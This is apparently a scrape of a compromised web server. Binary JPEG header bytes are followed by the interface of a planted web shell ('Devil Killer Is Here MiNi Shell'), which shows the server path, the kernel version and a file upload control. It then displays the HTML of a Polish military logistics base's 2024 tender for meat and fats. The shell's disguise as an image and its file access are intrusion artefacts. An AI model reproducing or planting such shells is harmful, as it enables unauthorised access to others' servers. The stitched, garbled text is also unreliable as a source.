JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241128/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241128/0062145201-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> D/205/2024 DOSTAWA MIĘSA, PRODUKTÓW MIĘSNO-WĘDLINIARSKICH ORAZ TŁUSZCZY ZWIERZĘCYCH I ROŚLINNYCH </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">2 REGIONALNA BAZA LOGISTYCZNA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 142665904</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Marsa 110</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">04-470</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">2rblog.zampub@ron.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.2rblog.wp.mil.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Skarb Państwa, jednostka budżetowa, podsektor rządowy </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Obrona</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> D/205/2024 DOSTAWA MIĘSA, PRODUKTÓW MIĘSNO-WĘDLINIARSKICH ORAZ TŁUSZCZY ZWIERZĘCYCH I ROŚLINNYCH </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b5952f7f-3e49-4027-945a-72599d812fd1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00621452</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-11-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/2rblog <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/2rblog</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">https://platformazakupowa.pl/pn/2rblog</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://platformazakupowa.pl/pn/2rblog</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Rozdział XX SWZ- ochrona danych osobowych</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Rozdział XX SWZ- ochrona danych osobowych</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">D/205/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa dostawę mięsa, produktów mięsno-wędliniarskich oraz tłuszczy zwierzęcych i<br/>roślinnych dla zamówienia podstawowe i opcjonalnego, zakresie zadania nr 1, w niżej wymienionych ilościach:<br/>1. Antrykot wołowy b/k kręg. w ilości 200kg. w tym - ilość podstawowa 100kg - ilość opcjonalna 100kg<br/>2. Wołowina ekstra w ilości 80 kg. w tym - ilość podstawowa 40kg - ilość opcjonalna 40kg<br/>3. Polędwica wołowa w ilości 10 kg. w tym- ilość podstawowa 5kg - ilość opcjonalna 5kg<br/>4. Polędwica wieprzowa w ilości 50kg. w tym - ilość podstawowa 25kg- ilość opcjonalna 25kg<br/>5. Wołowina zrazowa b/k w ilości 120kg. w tym - ilość podstawowa 60kg - ilość opcjonalna 60kg<br/>6. Udziec cielęcy b/k w ilości 20kg w tym- ilość podstawowa 10kg- ilość opcjonalna 10kg<br/>7. Łopatka cielęca b/k w ilości 10kg. w tym - ilość podstawowa 5kg - ilość opcjonalna 5kg<br/>8. Karkówka wieprzowa b/k w ilości 400kg. w tym - ilość podstawowa 200kg - ilość opcjonalna 200kg<br/>9. Karkówka wieprzowa z/k w ilości 40kg. w tym - ilość podstawowa 20kg- ilość opcjonalna 20kg<br/>10.Łopatka wieprzowa b/k w ilości 400kg. w tym - ilość podstawowa 200kg- ilość opcjonalna 200kg<br/>11.Schab wieprzowy b/k w ilości 400kg. w tym - ilość podstawowa 200kg- ilość opcjonalna 200kg<br/>12.Schab wieprzowy z/k w ilości 40kg. w tym- ilość podstawowa 20kg- ilość opcjonalna 20kg<br/>13.Boczek surowy b/k kg. w ilości 60kg w tym - ilość podstawowa 30kg - ilość opcjonalna 30kg<br/>14.Żeberka wieprzowe w ilości 400kg. w tym - ilość podstawowa 200kg - ilość opcjonalna 200kg<br/>15.Żeberka wędzone w ilości 16kg. w tym - ilość podstawowa 8kg - ilość opcjonalna 8kg<br/>16.Szynka wieprzowa b/k w ilości 400kg. w tym - ilość podstawowa 200kg- ilość opcjonalna 200kg<br/>17.Mięso wieprzowe od szynki b/k drobne w ilości 50kg. w tym - ilość podstawowa 25kg - ilość opcjonalna 25kg<br/>18.Golonka wieprzowa b/k - pakowana próżniowo w ilości 300kg. - ilość podstawowa 150kg - ilość opcjonalna 150kg<br/>19.Ozorki wieprzowe w ilości 50kg. w tym - ilość podstawowa 25kg - ilość opcjonalna 25kg<br/>20.Wątroba wieprzowa	w ilości 50kg. - ilość podstawowa 25kg - ilość opcjonalna 25kg<br/>21.Pasztetowa w ilości 10kg. - ilość podstawowa 5kg - ilość opcjonalna 5kg<br/>22.Salceson włoski w ilości 10kg. w tym - ilość podstawowa 5kg - ilość opcjonalna 5kg<br/>23.Salceson ozorkowy w ilości 10kg. w tym - ilość podstawowa 5kg - ilość opcjonalna 5kg<br/>24.Kaszanka z kaszy gryczanej w ilości 40kg. - ilość podstawowa 20kg - ilość opcjonalna 20kg<br/>25.Salami w ilości 16kg. w tym - ilość podstawowa 8kg - ilość opcjonalna 8kg<br/>26.Kiełbasa myśliwska w ilości 40kg. w tym - ilość podstawowa 20kg - ilość opcjonalna 20kg<br/>27.Kiełbasa jałowcowa w ilości 40kg. w tym - ilość podstawowa 20kg- ilość opcjonalna 20kg<br/>28.Frankfurterki w ilości 16kg. w tym - ilość podstawowa 8kg - ilość opcjonalna 8kg<br/>29.Kiełbasa parówkowa w ilości 40kg. w tym - ilość podstawowa 20kg - ilość opcjonalna 20kg<br/>30.Parówki z szynki w ilości 50kg. w tym - ilość podstawowa 25kg - ilość opcjonalna 25kg<br/>31.Mortadela w ilości 30kg. w tym- ilość podstawowa 15kg - ilość opcjonalna 15kg<br/>32.Kiełbasa biała parzona w ilości 60kg. w tym- ilość podstawowa 30kg- ilość opcjonalna 30 kg<br/>33.Kiełbasa podlaska w ilości 50kg. w tym- ilość podstawowa 25 kg - ilość opcjonalna 25 kg<br/>34.Kiełbasa wiejska w ilości 50kg. w tym- ilość podstawowa 25 kg - ilość opcjonalna 25 kg<br/>35.Kiełbasa śląska w ilości 80kg. w tym- ilość podstawowa 40 kg - ilość opcjonalna 40 kg<br/>36.Kiełbasa toruńska w ilości 70kg. w tym- ilość podstawowa 35 kg - ilość opcjonalna 35 kg<br/>37.Kiełbasa zwyczajna w ilości 70kg. w tym - ilość podstawowa 35 kg - ilość opcjonalna 35 kg<br/>38.Kiełbasa krakowska parzona	w ilości 24kg. w tym- ilość podstawowa 12 kg - ilość opcjonalna 12 kg<br/>39.Kiełbasa szynkowa wieprzowa w ilości 24kg.	w tym - ilość podstawowa 12 kg - ilość opcjonalna 12 kg<br/>40.Kiełbasa krakowska sucha w ilości 30kg. w tym- ilość podstawowa 15 kg - ilość opcjonalna 15 kg<br/>41.Kiełbasa żywiecka w ilości 30kg. w tym- ilość podstawowa 15 kg - ilość opcjonalna 15 kg<br/>42.Kabanosy w ilości 20kg. w tym- ilość podstawowa 10 kg - ilość opcjonalna 10 kg<br/>43.Baleron w ilości 20kg. w tym- ilość podstawowa 10 kg - ilość opcjonalna 10 kg<br/>44.Polędwica wieprzowa wędzona w ilości 20kg. w tym - ilość podstawowa 10 kg - ilość opcjonalna 10 kg<br/>45.Szynka wieprzowa wędzona	w ilości 30kg. w tym- ilość podstawowa 15 kg - ilość opcjonalna 15 kg<br/>46.Szynka wieprzowa gotowana w ilości 20kg. w tym- ilość podstawowa 10 kg - ilość opcjonalna 10 kg<br/>47.Szynka wieprzowa konserwowa w ilości 30kg. w tym- ilość podstawowa 15kg- ilość opcjonalna 15kg<br/>48.Boczek wędzony parzony b/k w ilości 160kg. w tym - ilość podstawowa 80kg- ilość opcjonalna 80kg<br/>49.Schab pieczony w ilości 30kg. w tym- ilość podstawowa 15kg- ilość opcjonalna 15kg<br/>50.Rolada z boczku w ilości 20kg. w tym- ilość podstawowa 10kg- ilość opcjonalna 10kg<br/>51.Pasztet wieprzowy pieczony w ilości 20kg. w tym - ilość podstawowa 10kg- ilość opcjonalna 10kg<br/>52.Golonka wieprzowa w ilości 20kg. w tym - ilość podstawowa 10kg- ilość opcjonalna 10kg<br/>53.Ogonówka w ilości 30kg. w tym- ilość podstawowa 15kg - ilość opcjonalna 15kg<br/>54.Smalec wieprzowy w ilości 80kg. w tym- ilość podstawowa 40kg- ilość opcjonalna 40kg<br/>55.Słonina w ilości 80kg w tym - ilość podstawowa 40kg- ilość opcjonalna 40kg </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15100000-9 - Produkty zwierzęce, mięso i produkty mięsne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje prawo opcji w przedmiotowym postępowaniu w zakresie zadania nr 1:<br/>1. Antrykot wołowy b/k kręg. w ilości 200kg. w tym ilość opcjonalna 100kg<br/>2. Wołowina ekstra w ilości 80 kg. w tym ilość opcjonalna 40kg<br/>3. Polędwica wołowa w ilości 10 kg. w tym ilość opcjonalna 5kg<br/>4. Polędwica wieprzowa w ilości 50kg. w tym ilość opcjonalna 25kg<br/>5. Wołowina zrazowa b/k w ilości 120kg. w tym ilość opcjonalna 60kg<br/>6. Udziec cielęcy b/k w ilości 20kg w tym ilość opcjonalna 10kg<br/>7. Łopatka cielęca b/k w ilości 10kg. w tym ilość opcjonalna 5kg<br/>8. Karkówka wieprzowa b/k w ilości 400kg. w tym ilość opcjonalna 200kg<br/>9. Karkówka wieprzowa z/k w ilości 40kg. w tym ilość opcjonalna 20kg<br/>10.Łopatka wieprzowa b/k w ilości 400kg. w tym ilość opcjonalna 200kg<br/>11.Schab wieprzowy b/k w ilości 400kg. w tym ilość opcjonalna 200kg<br/>12.Schab wieprzowy z/k w ilości 40kg. w tym ilość opcjonalna 20kg<br/>13.Boczek surowy b/k kg. w ilości 60kg w tym ilość opcjonalna 30kg<br/>14.Żeberka wieprzowe w ilości 400kg. w tym ilość opcjonalna 200kg<br/>15.Żeberka wędzone w ilości 16kg. w tym ilość opcjonalna 8kg<br/>16.Szynka wieprzowa b/k w ilości 400kg. w tym ilość opcjonalna 200kg<br/>17.Mięso wieprzowe od szynki b/k drobne w ilości 50kg. w tym ilość opcjonalna 25kg<br/>18.Golonka wieprzowa b/k - pakowana próżniowo w ilości 300kg. ilość opcjonalna 150kg<br/>19.Ozorki wieprzowe w ilości 50kg. w tym ilość opcjonalna 25kg<br/>20.Wątroba wieprzowa	w ilości 50kg. ilość opcjonalna 25kg<br/>21.Pasztetowa w ilości 10kg. ilość opcjonalna 5kg<br/>22.Salceson włoski w ilości 10kg. w tym ilość opcjonalna 5kg<br/>23.Salceson ozorkowy w ilości 10kg. w tym ilość opcjonalna 5kg<br/>24.Kaszanka z kaszy gryczanej w ilości 40kg. ilość opcjonalna 20kg<br/>25.Salami w ilości 16kg. w tym ilość opcjonalna 8kg<br/>26.Kiełbasa myśliwska w ilości 40kg. w tym ilość opcjonalna 20kg<br/>27.Kiełbasa jałowcowa w ilości 40kg. w tym ilość opcjonalna 20kg<br/>28.Frankfurterki w ilości 16kg. w tym ilość opcjonalna 8kg<br/>29.Kiełbasa parówkowa w ilości 40kg. w tym ilość opcjonalna 20kg<br/>30.Parówki z szynki w ilości 50kg. w tym ilość opcjonalna 25kg<br/>31.Mortadela w ilości 30kg. w tym ilość opcjonalna 15kg<br/>32.Kiełbasa biała parzona w ilości 30kg.w tym ilość opcjonalna 15 kg<br/>33.Kiełbasa podlaska w ilości 50kg. w tym ilość opcjonalna 25 kg<br/>34.Kiełbasa wiejska w ilości 50kg. w tym ilość opcjonalna 25 kg<br/>35.Kiełbasa śląska w ilości 80kg. w tym ilość opcjonalna 40 kg<br/>36.Kiełbasa toruńska w ilości 70kg. w tym ilość opcjonalna 35 kg<br/>37.Kiełbasa zwyczajna w ilości 70kg. w tym ilość opcjonalna 35 kg<br/>38.Kiełbasa krakowska parzona	w ilości 24kg. w tym ilość opcjonalna 12 kg<br/>39.Kiełbasa szynkowa wieprzowa w ilości 24kg. w tym ilość opcjonalna 12 kg<br/>40.Kiełbasa krakowska sucha w ilości 30kg. w tym ilość opcjonalna 15 kg<br/>41.Kiełbasa żywiecka w ilości 30kg. w tym ilość opcjonalna 15 kg<br/>42.Kabanosy w ilości 10kg. w tym ilość opcjonalna 5 kg<br/>43.Baleron w ilości 20kg. w tym ilość opcjonalna 10 kg<br/>44.Polędwica wieprzowa wędzona w ilości 20kg. w tym ilość opcjonalna 10 kg<br/>45.Szynka wieprzowa wędzona	w ilości 30kg. w tym ilość opcjonalna 15 kg<br/>46.Szynka wieprzowa gotowana w ilości 20kg. w tym ilość opcjonalna 10 kg<br/>47.Szynka wieprzowa konserwowa w ilości 30kg. w tym ilość opcjonalna 15kg<br/>48.Boczek wędzony parzony b/k w ilości 160kg. w tym ilość opcjonalna 80kg<br/>49.Schab pieczony w ilości 30kg. w tym ilość opcjonalna 15kg<br/>50.Rolada z boczku w ilości 20kg. w tym ilość opcjonalna 10kg<br/>51.Pasztet wieprzowy pieczony w ilości 20kg. w tym ilość opcjonalna 10kg<br/>52.Golonka wieprzowa w ilości 20kg. w tym ilość opcjonalna 10kg<br/>53.Ogonówka w ilości 30kg. w tym ilość opcjonalna 15kg<br/>54.Smalec wieprzowy w ilości 40kg. w tym ilość opcjonalna 20kg<br/>55.Słonina w ilości 40kg w tym ilość opcjonalna 20kg <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-01 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa dostawę mięsa, produktów mięsno-wędliniarskich oraz tłuszczy zwierzęcych i<br/>roślinnych dla zamówienia podstawowe i opcjonalnego, w zakresie zadania nr 2, w niżej wymienionych ilościach:<br/>1. Olej rzepakowy w ilości 500l	w tym - ilość podstawowa 250l- ilość opcjonalna 250l<br/>2. Oliwa z oliwek w ilości 30l w tym - ilość podstawowa 15l- ilość opcjonalna 15l<br/>3. Olej słonecznikowy w ilości 20l w tym - ilość podstawowa 10l - ilość opcjonalna 10l<br/>4. Olej sezamowy w ilości 6l w tym - ilość podstawowa 3l- ilość opcjonalna 3l<br/>5. Olej kukurydziany w ilości 6l w tym - ilość podstawowa 3l - ilość opcjonalna 3l<br/>6. Olej z pestek winogron w ilości 6l w tym - ilość podstawowa 3l- ilość opcjonalna 3l<br/>7. Margaryna jednoporcjowa w ilości 60kg. w tym - ilość podstawowa 30kg - ilość opcjonalna 30kg<br/>8. Margaryna w ilości 60kg. w tym - ilość podstawowa 30kg - ilość opcjonalna 30kg<br/>9. Masło orzechowe jednoporcjowe w ilości 30kg. w tym - ilość podstawowa 15kg - ilość opcjonalna 15kg<br/>10. Masło orzechowe w ilości 8kg. w tym - ilość podstawowa 4kg - ilość opcjonalna 4kg </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15400000-2 - Oleje i tłuszcze zwierzęce lub roślinne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje prawo opcji w przedmiotowym postępowaniu w zakresie zadania nr 2:<br/>1. Olej rzepakowy w ilości 500l	w tym ilość opcjonalna 250l<br/>2. Oliwa z oliwek w ilości 30l w tym ilość opcjonalna 15l<br/>3. Olej słonecznikowy w ilości 20l w tym ilość opcjonalna 10l<br/>4. Olej sezamowy w ilości 6l w tym ilość opcjonalna 3l<br/>5. Olej kukurydziany w ilości 6l w tym ilość opcjonalna 3l<br/>6. Olej z pestek winogron w ilości 6l w tym ilość opcjonalna 3l<br/>7. Margaryna jednoporcjowa w ilości 60kg. w tym ilość opcjonalna 30kg<br/>8. Margaryna w ilości 60kg. w tym ilość opcjonalna 30kg<br/>9. Masło orzechowe jednoporcjowe w ilości 30kg. w tym ilość opcjonalna 15kg<br/>10. Masło orzechowe w ilości 8kg. w tym ilość opcjonalna 4kg <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-01 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału 